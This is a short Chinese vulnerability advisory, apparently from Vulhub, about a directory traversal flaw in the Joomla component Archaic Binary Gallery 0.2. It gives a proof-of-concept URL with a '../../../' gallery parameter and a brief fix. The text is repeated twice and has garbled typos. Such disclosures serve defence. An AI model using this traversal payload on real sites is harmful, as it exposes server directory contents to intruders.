VULHUB ™

###0x01漏洞简介 joomla组件archaic binary gallery版本0.2存在目录遍历的漏洞。远策会难过攻击者可以利用该漏洞遍历/ images/gallery下的目录机器子目录的内容。 ###0x02漏洞验证 该漏洞利用的POC如下所示： ``` http://XXX/index.php?option=com_ab_gallery&Itemid=37&gallery=../../../ ``` 结果如下：  还可以进入子目录进行遍历：  ###0x03修复方案 对提交的请求参数进行检查过滤即可。

###0x01漏洞简介 joomla组件archaic binary gallery版本0.2存在目录遍历的漏洞。远策会难过攻击者可以利用该漏洞遍历/ images/gallery下的目录机器子目录的内容。 ###0x02漏洞验证 该漏洞利用的POC如下所示： ``` http://XXX/index.php?option=com_ab_gallery&Itemid=37&gallery=../../../ ``` 结果如下：  还可以进入子目录进行遍历：  ###0x03修复方案 对提交的请求参数进行检查过滤即可。